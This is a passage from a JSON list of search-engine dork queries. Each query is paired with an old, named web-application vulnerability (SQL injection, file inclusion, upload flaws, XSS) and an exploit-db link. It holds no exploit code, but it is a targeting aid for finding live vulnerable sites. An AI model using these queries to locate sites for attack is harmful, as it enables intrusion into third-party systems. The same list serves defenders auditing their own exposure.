Solution - learning management system\"", "long description": "Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: http://www.exploit-db.com/exploits/6613", "submited": "2010-11-15", "request": "\"Powered by PG Online Training Solution - learning management system\"", "id": 2531}, {"short description": "inurl:\"track.php?id=\"", "long description": "phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: http://www.exploit-db.com/exploits/7134", "submited": "2010-11-15", "request": "inurl:\"track.php?id=\"", "id": 2532}, {"short description": "inurl:com_jcommunity", "long description": "joomla com_jcommunity SQLi Vulnerability: http://www.exploit-db.com/exploits/13798", "submited": "2010-11-15", "request": "inurl:com_jcommunity", "id": 2533}, {"short description": "inurl:cart.php?m=features&id=", "long description": "digiSHOP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15405", "submited": "2010-11-15", "request": "inurl:cart.php?m=features&id=", "id": 2534}, {"short description": "/modules/tadbook2/open_book.php?book_sn=", "long description": "XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: http://www.exploit-db.com/exploits/7725", "submited": "2010-11-15", "request": "/modules/tadbook2/open_book.php?book_sn=", "id": 2537}, {"short description": "''links.asp?CatId''", "long description": "ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5276", "submited": "2010-11-15", "request": "''links.asp?CatId''", "id": 2540}, {"short description": "\"Bu Site Ticimax E-Ticaret yaz1l1m1 1le haz1rlanm1st1r.\"", "long description": "Ticimax E-Ticaret ( SQL Injection ): http://www.exploit-db.com/exploits/12841", "submited": "2010-11-15", "request": "\"Bu Site Ticimax E-Ticaret yaz1l1m1 ile haz1rlanm1st1r.\"", "id": 2541}, {"short description": "Powered by NKINFOWEB VSp 2009", "long description": "NKINFOWEB SQL Injection - 
CVE: 2010-1599: http://www.exploit-db.com/exploits/12354", "submited": "2010-11-15", "request": "Powered by NKINFOWEB VSp 2009", "id": 2542}, {"short description": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "long description": "PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14106", "submited": "2010-11-15", "request": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "id": 2543}, {"short description": "Powered by: Arab Portal inurl:mod.php?mod=html", "long description": "Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: http://www.exploit-db.com/exploits/7019", "submited": "2010-11-15", "request": "Powered by: Arab Portal inurl:mod.php?mod=html", "id": 2544}, {"short description": "\"Powered by RedCat\" inurl:index.php?contentId=", "long description": "redcat media SQL Injection: http://www.exploit-db.com/exploits/10043", "submited": "2010-11-15", "request": "\"Powered by RedCat\" inurl:index.php?contentId=", "id": 2545}, {"short description": "inurl:\"search_form.php?sb_showresult=\"", "long description": "Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: http://www.exploit-db.com/exploits/6143", "submited": "2010-11-15", "request": "inurl:\"search_form.php?sb_showresult=\"", "id": 2546}, {"short description": "Powered by boastMachine v3.1", "long description": "boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: http://www.exploit-db.com/exploits/4952", "submited": "2010-11-15", "request": "Powered by boastMachine v3.1", "id": 2548}, {"short description": "\"index.php?section=post_upload\"", "long description": "DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: http://www.exploit-db.com/exploits/7629", "submited": "2010-11-15", "request": "\"index.php?section=post_upload\"", "id": 2549}, {"short description": ": allinurl: In YoUr Dream Lamerz", "long description": "http://www.exploit-db.com/exploits/14078", 
"submited": "2010-11-15", "request": "", "id": 2550}, {"short description": "Copyright 2007, PHPAUCTION.NET", "long description": "phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: http://www.exploit-db.com/exploits/5892", "submited": "2010-11-15", "request": "Copyright 2007, PHPAUCTION.NET", "id": 2551}, {"short description": "Online Booking Manager2.2", "long description": "Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: http://www.exploit-db.com/exploits/5964", "submited": "2010-11-15", "request": "Online Booking Manager2.2", "id": 2552}, {"short description": "\"cms SunLight 5.2\"", "long description": "SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: http://www.exploit-db.com/exploits/3953", "submited": "2010-11-15", "request": "\"cms SunLight 5.2\"", "id": 2553}, {"short description": "option=com_paxxgallery", "long description": "Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: http://www.exploit-db.com/exploits/5514", "submited": "2010-11-15", "request": "option=com_paxxgallery", "id": 2554}, {"short description": "inurl:index.php?option=com_NeoRecruit", "long description": "Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: http://www.exploit-db.com/exploits/4305", "submited": "2010-11-15", "request": "inurl:index.php?option=com_NeoRecruit", "id": 2555}, {"short description": "powered by x7 chat 1.3.6b", "long description": "X7CHAT v1.3.6b Add Admin: http://www.exploit-db.com/exploits/10931", "submited": "2010-11-15", "request": "powered by x7 chat 1.3.6b", "id": 2557}, {"short description": "\"Powered by Battle Blog\"", "long description": "Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: http://www.exploit-db.com/exploits/5731", "submited": "2010-11-15", "request": "\"Powered by Battle Blog\"", "id": 2558}, {"short description": "inurl:\"vcalendar_asp\"", "long description": 
"VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7180", "submited": "2010-11-15", "request": "inurl:\"vcalendar_asp\"", "id": 2559}, {"short description": "inurl:\"com_simpledownload\"", "long description": "Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: http://www.exploit-db.com/exploits/12623", "submited": "2010-11-15", "request": "inurl:\"com_simpledownload\"", "id": 2561}, {"short description": "allinurl :\"/modules/tutorials/\"", "long description": "XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: http://www.exploit-db.com/exploits/5245", "submited": "2010-11-15", "request": "allinurl :\"/modules/tutorials/\"", "id": 2562}, {"short description": "intext:Powered by Infront", "long description": "Infront SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13848", "submited": "2010-11-15", "request": "intext:Powered by Infront", "id": 2563}, {"short description": "Powered by Info Fisier.", "long description": "Info Fisier 1.0 multiple Vulnerabilities: http://www.exploit-db.com/exploits/10728", "submited": "2010-11-15", "request": "Powered by Info Fisier.", "id": 2564}, {"short description": "powered by joovili", "long description": "Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: http://www.exploit-db.com/exploits/4799", "submited": "2010-11-15", "request": "powered by joovili", "id": 2565}, {"short description": "intext:Powered by SaphpLesson 4.0", "long description": "SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: http://www.exploit-db.com/exploits/9248", "submited": "2010-11-15", "request": "intext:Powered by SaphpLesson 4.0", "id": 2566}, {"short description": "infusions/triscoop_race_system/race_details.php?", "long description": "PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: http://www.exploit-db.com/exploits/6684", "submited": "2010-11-15", 
"request": "infusions/triscoop_race_system/race_details.php?", "id": 2568}, {"short description": "Powered by WHMCompleteSolution - or inurl:WHMCS", "long description": "WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: http://www.exploit-db.com/exploits/12371", "submited": "2010-11-15", "request": "Powered by WHMCompleteSolution - or inurl:WHMCS", "id": 2569}, {"short description": "intext:\"Event List 0.8 Alpha by schlu.net \"", "long description": "Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: http://www.exploit-db.com/exploits/4309", "submited": "2010-11-15", "request": "intext:\"Event List 0.8 Alpha by schlu.net \"", "id": 2570}, {"short description": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "long description": "Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: http://www.exploit-db.com/exploits/12805", "submited": "2010-11-15", "request": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "id": 2572}, {"short description": "\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\"", "long description": "Subdreamer Pro v3.0.4 CMS upload Vulnerability: http://www.exploit-db.com/exploits/14101", "submited": "2010-11-15", "request": "\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\"", "id": 2573}, {"short description": "developed by ARWScripts.com", "long description": "Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: http://www.exploit-db.com/exploits/5419", "submited": "2010-11-15", "request": "developed by ARWScripts.com", "id": 2574}, {"short description": "\"powered by CMS Made Simple version 1.1.2\"", "long description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/4442", "submited": "2010-11-15", "request": "\"powered by CMS Made Simple version 1.1.2\"", "id": 2575}, {"short description": "\"Desenvolvido por WeBProdZ\"", 
"long description": "WeBProdZ CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12522", "submited": "2010-11-15", "request": "\"Desenvolvido por WeBProdZ\"", "id": 2577}, {"short description": "inurl:\"inurl:file.php?recordID=\"", "long description": "FILE SHARE v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10497", "submited": "2010-11-15", "request": "inurl:\"inurl:file.php?recordID=\"", "id": 2579}, {"short description": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "long description": "Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: http://www.exploit-db.com/exploits/5387", "submited": "2010-11-15", "request": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "id": 2580}, {"short description": "\"Webdesign Cosmos Solutions\"", "long description": "Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): http://www.exploit-db.com/exploits/12794", "submited": "2010-11-15", "request": "\"Webdesign Cosmos Solutions\"", "id": 2581}, {"short description": "inurl:cal_cat.php?op=", "long description": "Calendarix (cal_cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14393", "submited": "2010-11-15", "request": "inurl:cal_cat.php?op=", "id": 2583}, {"short description": "inurl:com_liveticker", "long description": "Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln - CVE: 2008-6148: http://www.exploit-db.com/exploits/7573", "submited": "2010-11-15", "request": "inurl:com_liveticker", "id": 2584}, {"short description": "intext:\"Powered by the 1-2-3 music store\"", "long description": "Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: http://www.exploit-db.com/exploits/4134", "submited": "2010-11-15", "request": "intext:\"Powered by the 1-2-3 music store\"", "id": 2585}, {"short description": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "long description": "myBusinessAdmin 
(content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11327", "submited": "2010-11-15", "request": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "id": 2588}, {"short description": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "long description": "cityadmin (links.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11326", "submited": "2010-11-15", "request": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "id": 2589}, {"short description": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "long description": "RealAdmin (detail.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11325", "submited": "2010-11-15", "request": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "id": 2590}, {"short description": "?action=pro_show and ?action=disppro", "long description": "EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: http://www.exploit-db.com/exploits/6139", "submited": "2010-11-15", "request": "?action=pro_show and ?action=disppro", "id": 2591}, {"short description": "Powered by WebspotBlogging", "long description": "bspotBlogging 3.0.1 (path) Remote File Include Vulnerability - CVE: 2006-2860: http://www.exploit-db.com/exploits/1871", "submited": "2010-11-15", "request": "Powered by WebspotBlogging", "id": 2592}, {"short description": "\"powered by vsp stats processor\"", "long description": "vsp stats processor 0.45 (gamestat.php gameID) SQL Injection Vuln - CVE: 2009-1224: http://www.exploit-db.com/exploits/8331", "submited": "2010-11-15", "request": "\"powered by vsp stats processor\"", "id": 2593}, {"short description": "inurl:employer_profile.php?compid=", "long description": "ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: http://www.exploit-db.com/exploits/6249", "submited": "2010-11-15", "request": "inurl:employer_profile.php?compid=", "id": 2594}, {"short description": 
"inurl:com_awd_song", "long description": "Joomla JE Awd Song Component Persistent XSS Vulnerability - CVE: 2010-2613: http://www.exploit-db.com/exploits/14059", "submited": "2010-11-15", "request": "inurl:com_awd_song", "id": 2595}, {"short description": "\"MangoBery 1.0 Alpha\"", "long description": "MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability - CVE: 2007-1837: http://www.exploit-db.com/exploits/3598", "submited": "2010-11-15", "request": "\"MangoBery 1.0 Alpha\"", "id": 2599}, {"short description": "inurl:view_group.php?id=", "long description": "BookMarks Favourites Script (view_group.php id) SQL Injection Vuln - CVE: 2008-6007: http://www.exploit-db.com/exploits/6637", "submited": "2010-11-15", "request": "inurl:view_group.php?id=", "id": 2600}, {"short description": "mod.php?mod=publisher&op=printarticle&artid=", "long description": "eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: http://www.exploit-db.com/exploits/15006", "submited": "2010-11-15", "request": "mod.php?mod=publisher&op=printarticle&artid=", "id": 2601}, {"short description": "inurl:\"index.php?option=com_spa\"", "long description": "Joomla Component com_spa SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14423", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_spa\"", "id": 2602}, {"short description": "inurl:\"photo_album.php?alb_id=\"", "long description": "SpireCMS v2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10408", "submited": "2010-11-15", "request": "inurl:\"photo_album.php?alb_id=\"", "id": 2605}, {"short description": "intext : \"Website by conceptinternetltd\"", "long description": "Concept E-commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14512", "submited": "2010-11-15", "request": "intext : \"Website by conceptinternetltd\"", "id": 2606}, {"short description": "allinurl: \"index.php?p=gallerypic img_id\"", "long description": "Koobi 4.4/5.4 gallery Remote SQL 
Injection Vulnerability - CVE: 2008-6210: http://www.exploit-db.com/exploits/5415", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=gallerypic img_id\"", "id": 2607}, {"short description": "allinurl:com_jpad", "long description": "Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth) - CVE: 2008-4715: http://www.exploit-db.com/exploits/5493", "submited": "2010-11-15", "request": "allinurl:com_jpad", "id": 2608}, {"short description": "allinurl:\"com_candle\"", "long description": "Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5221", "submited": "2010-11-15", "request": "allinurl:\"com_candle\"", "id": 2610}, {"short description": "\"powered by FlatPress\"", "long description": "FlatPress 0.909.1 Stored XSS Vulnerability: http://www.exploit-db.com/exploits/12034", "submited": "2010-11-15", "request": "\"powered by FlatPress\"", "id": 2611}, {"short description": "inurl:ugroups.php?UID=", "long description": "TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability - CVE: 2008-3674: http://www.exploit-db.com/exploits/6170", "submited": "2010-11-15", "request": "inurl:ugroups.php?UID=", "id": 2612}, {"short description": "allinurl:option=com_livechat", "long description": "Joomla Live Chat (SQL/Proxy) Multiple Remote Vulnerabilities - CVE: 2008-6883: http://www.exploit-db.com/exploits/7441", "submited": "2010-11-15", "request": "allinurl:option=com_livechat", "id": 2613}, {"short description": "Powered by PHP Melody 1.5.3", "long description": "blog ink Bypass Setting Vulnerability: http://www.exploit-db.com/exploits/11462", "submited": "2010-11-15", "request": "Powered by PHP Melody 1.5.3", "id": 2614}, {"short description": "Powered by phpMyDesktop|arcade v1.0 (final)", "long description": "PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: http://www.exploit-db.com/exploits/4755", "submited": "2010-11-15", "request": "Powered by phpMyDesktop|arcade v1.0 (final)", 
"id": 2615}, {"short description": "inurl:com_products \"intCategoryId\"", "long description": "Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11691", "submited": "2010-11-15", "request": "inurl:com_products \"intCategoryId\"", "id": 2616}, {"short description": "inurl:\"guestbook.admin.php?action=settings\"", "long description": "Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: http://www.exploit-db.com/exploits/10626", "submited": "2010-11-15", "request": "inurl:\"guestbook.admin.php?action=settings\"", "id": 2617}, {"short description": "inurl:index.php?mod=jeuxflash", "long description": "KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability - CVE: 2007-4922: http://www.exploit-db.com/exploits/4400", "submited": "2010-11-15", "request": "inurl:index.php?mod=jeuxflash", "id": 2620}, {"short description": "inurl:\"track.php?id=\"", "long description": "SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: http://www.exploit-db.com/exploits/6910", "submited": "2010-11-15", "request": "inurl:\"track.php?id=\"", "id": 2622}, {"short description": "\"Ladder Scripts by\"", "long description": "My Gaming Ladder 7.5 (ladderid) SQL Injection Vulnerability - CVE: 2008-1791: http://www.exploit-db.com/exploits/5401", "submited": "2010-11-15", "request": "\"Ladder Scripts by\"", "id": 2623}, {"short description": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "long description": "POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: http://www.exploit-db.com/exploits/2201", "submited": "2010-11-15", "request": "\"powergap\" or \"s04.php\" or s01.php or s02.php", "id": 2624}, {"short description": "\"Developed by Bispage.com\"", "long description": "bispage Bypass Vulnerability: http://www.exploit-db.com/exploits/11555", "submited": "2010-11-15", "request": "\"Developed by Bispage.com\"", "id": 2625}, {"short description": "\"PKs Movie 
Database\"", "long description": "PKs Movie Database 3.0.3 XSS / SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/5095", "submited": "2010-11-15", "request": "\"PKs Movie Database\"", "id": 2626}, {"short description": "inurl:enq/big.asp?id=", "long description": "(big.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12533", "submited": "2010-11-15", "request": "inurl:enq/big.asp?id=", "id": 2628}, {"short description": "Script cree par Funewik - Dezign-Box France", "long description": "Galerie Dezign-Box France Multi Vulnerability: http://www.exploit-db.com/exploits/11523", "submited": "2010-11-15", "request": "Script cree par Funewik - Dezign-Box France", "id": 2629}, {"short description": "allintext:\"Powered By Buddy Zone\"", "long description": "Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-3549: http://www.exploit-db.com/exploits/4127", "submited": "2010-11-15", "request": "allintext:\"Powered By Buddy Zone\"", "id": 2630}, {"short description": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "long description": "Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12736", "submited": "2010-11-15", "request": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "id": 2631}, {"short description": "com_thyme", "long description": "Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: http://www.exploit-db.com/exploits/7182", "submited": "2010-11-15", "request": "com_thyme", "id": 2632}, {"short description": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "long description": "PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: http://www.exploit-db.com/exploits/4872", "submited": "2010-11-15", "request": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "id": 2636}, {"short description": "All right reserved 2002-2003 (MSN/Web Server Creator)", 
"long description": "Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: http://www.exploit-db.com/exploits/11569", "submited": "2010-11-15", "request": "All right reserved 2002-2003 (MSN/Web Server Creator)", "id": 2638}, {"short description": "\"Powerd by www.e-webtech.com\"", "long description": "e-webtech (page.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12571", "submited": "2010-11-15", "request": "\"Powerd by www.e-webtech.com\"", "id": 2640}, {"short description": "powered by PhpMesFilms", "long description": "PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: http://www.exploit-db.com/exploits/7660", "submited": "2010-11-15", "request": "powered by PhpMesFilms", "id": 2641}, {"short description": "\"Internet Photoshow - Slideshow\"", "long description": "Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: http://www.exploit-db.com/exploits/5617", "submited": "2010-11-15", "request": "\"Internet Photoshow - Slideshow\"", "id": 2645}, {"short description": "inurl:choosecard.php?catid=", "long description": "WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: http://www.exploit-db.com/exploits/6977", "submited": "2010-11-15", "request": "inurl:choosecard.php?catid=", "id": 2646}, {"short description": "\"Powered by Real Estate Portal\"", "long description": "NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: http://www.exploit-db.com/exploits/7208", "submited": "2010-11-15", "request": "\"Powered by Real Estate Portal\"", "id": 2647}, {"short description": "inurl:browsecats.php?cid=", "long description": "PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: http://www.exploit-db.com/exploits/6169", "submited": "2010-11-15", "request": "inurl:browsecats.php?cid=", "id": 2648}, {"short description": "inurl:com_mdigg", "long description": "Joomla Component mdigg 
2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: http://www.exploit-db.com/exploits/7574", "submited": "2010-11-15", "request": "inurl:com_mdigg", "id": 2649}, {"short description": "\"by in-link\" or \"Powered by In-Link 2.\"", "long description": "In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/2295", "submited": "2010-11-15", "request": "\"by in-link\" or \"Powered by In-Link 2.\"", "id": 2651}, {"short description": "inurl:trr.php?id=", "long description": "Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: http://www.exploit-db.com/exploits/6271", "submited": "2010-11-15", "request": "inurl:trr.php?id=", "id": 2652}, {"short description": "inurl:\"kroax.php?category\"", "long description": "PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: http://www.exploit-db.com/exploits/5942", "submited": "2010-11-15", "request": "inurl:\"kroax.php?category\"", "id": 2653}, {"short description": "\"Powered by Reciprocal Links Manager\"", "long description": "Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: http://www.exploit-db.com/exploits/6349", "submited": "2010-11-15", "request": "\"Powered by Reciprocal Links Manager\"", "id": 2654}, {"short description": "allintext:\"Latest Pictures\" Name Gender Profile Rating", "long description": "Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: http://www.exploit-db.com/exploits/4191", "submited": "2010-11-15", "request": "allintext:\"Latest Pictures\" Name Gender Profile Rating", "id": 2656}, {"short description": "intext:\"Powered by eDocStore\"", "long description": "eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: http://www.exploit-db.com/exploits/4108", "submited": "2010-11-15", "request": "intext:\"Powered by eDocStore\"", "id": 2658}, {"short description": "Powered by AM4SS 1.0", "long description": "Advneced Management 
For Services Sites (File Disclosure) Vulnerabilities: http://www.exploit-db.com/exploits/12859", "submited": "2010-11-15", "request": "Powered by AM4SS 1.0", "id": 2660}, {"short description": "\"Powered by AlstraSoft SendIt Pro\"", "long description": "AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: http://www.exploit-db.com/exploits/7101", "submited": "2010-11-15", "request": "\"Powered by AlstraSoft SendIt Pro\"", "id": 2661}, {"short description": "inurl:com_content", "long description": "Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: http://www.exploit-db.com/exploits/6025", "submited": "2010-11-15", "request": "inurl:com_content", "id": 2663}, {"short description": "inurl:\"noticias.php?notiId=\"", "long description": "Ele Medios CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10418", "submited": "2010-11-15", "request": "inurl:\"noticias.php?notiId=\"", "id": 2664}, {"short description": "inurl:\"index.php?option=com_huruhelpdesk\"", "long description": "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: http://www.exploit-db.com/exploits/14449", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_huruhelpdesk\"", "id": 2665}, {"short description": "Powered by Article Directory", "long description": "Authenication Bypass Vulnerability in Articles Directory: http://www.exploit-db.com/exploits/12445", "submited": "2010-11-15", "request": "Powered by Article Directory", "id": 2667}, {"short description": "\"Copyright 2005 Affiliate Directory\"", "long description": "SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: http://www.exploit-db.com/exploits/6270", "submited": "2010-11-15", "request": "\"Copyright 2005 Affiliate Directory\"", "id": 2668}, {"short description": "inurl:\"index.php?option=com_bookjoomlas\"", "long description": "Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 
2009-1263: http://www.exploit-db.com/exploits/8353", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_bookjoomlas\"", "id": 2669}, {"short description": "DevMass Shopping Cart", "long description": "DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: http://www.exploit-db.com/exploits/4642", "submited": "2010-11-15", "request": "DevMass Shopping Cart", "id": 2670}, {"short description": "inurl:index.php?option=com_allhotels", "long description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: http://www.exploit-db.com/exploits/7568", "submited": "2010-11-15", "request": "inurl:index.php?option=com_allhotels", "id": 2671}, {"short description": "\"powered by aflog\"", "long description": "aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: http://www.exploit-db.com/exploits/6818", "submited": "2010-11-15", "request": "\"powered by aflog\"", "id": 2672}, {"short description": "inurl:\"index.php?option=com_simplefaq\"", "long description": "Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: http://www.exploit-db.com/exploits/4296", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_simplefaq\"", "id": 2673}, {"short description": "inurl:couponsite/index.php?page=", "long description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: http://www.exploit-db.com/exploits/6348", "submited": "2010-11-15", "request": "inurl:couponsite/index.php?page=", "id": 2674}, {"short description": "inurl:\"directory.php?ax=list\" gaming", "long description": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5374", "submited": "2010-11-15", "request": "inurl:\"directory.php?ax=list\" gaming", "id": 2675}, {"short description": "\"script by RECIPE SCRIPT\"", "long description": "The Recipe Script 5 Remote XSS Vulnerability: 
http://www.exploit-db.com/exploits/8967", "submited": "2010-11-15", "request": "\"script by RECIPE SCRIPT\"", "id": 2677}, {"short description": "inurl:\"index.php?option=com_jobline\"", "long description": "Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: http://www.exploit-db.com/exploits/9187", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jobline\"", "id": 2679}, {"short description": "Dosya Yukle Scrtipi v1.0", "long description": "Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11620", "submited": "2010-11-15", "request": "Dosya Yukle Scrtipi v1.0", "id": 2680}, {"short description": "allinurl: modules-php-op-modload \"req view_cat\"", "long description": "PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: http://www.exploit-db.com/exploits/5147", "submited": "2010-11-15", "request": "allinurl: modules-php-op-modload \"req view_cat\"", "id": 2681}, {"short description": "\"Powered by Absolute File Send\"", "long description": "Absolute File Send 1.0 Remote Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6881", "submited": "2010-11-15", "request": "\"Powered by Absolute File Send\"", "id": 2684}, {"short description": "inurl:wapmain.php?option=", "long description": "Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12440", "submited": "2010-11-15", "request": "inurl:wapmain.php?option=", "id": 2686}, {"short description": "allinurl:\"com_na_content\"", "long description": "Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: http://www.exploit-db.com/exploits/5076", "submited": "2010-11-15", "request": "allinurl:\"com_na_content\"", "id": 2688}, {"short description": "inurl:\"com_jcalpro\"", "long description": "Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: http://www.exploit-db.com/exploits/10587", 
